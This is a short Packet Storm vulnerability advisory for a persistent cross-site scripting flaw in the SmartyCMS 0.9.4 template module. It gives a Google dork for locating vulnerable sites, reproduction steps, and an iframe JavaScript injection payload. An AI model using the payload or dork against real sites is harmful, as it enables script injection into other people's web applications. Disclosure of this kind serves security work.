SmartyCMS version 0.9.4 suffers from a cross site scripting vulnerability in the template module.
10af188795a9131b3ae29fb69d0f1b38 TITLE: SmartyCMS 0.9.4 Template module Persistent XSS
vendor: SmartyCMS
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: Copyright 2007 by SmartyCMS 0.9.4 built 334
-------------------------------------------------------------------------------------------------------------------------------------------
DOWNLOAD FILE:
http://sourceforge.net/project/platformdownload.php?group_id=195556
DEMO: 1.http://localhost/smartycms-0.9.4-334/index.php?page=demo&
2.select 'Example01-Template Module'
3.Click on 'template module' tab
4.Edit title bar of the window and Inject JavaScript/HTML
POSTDATA: "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs & SH0uTz to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6(
N17|< ),1nJ3ct0r t3am and all my friends
------------------------------------------------------------------------------------------------------------
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments (1)
Oooh ! nice =)
2012-02-02 08:47:10 UTC | Permalink | Reply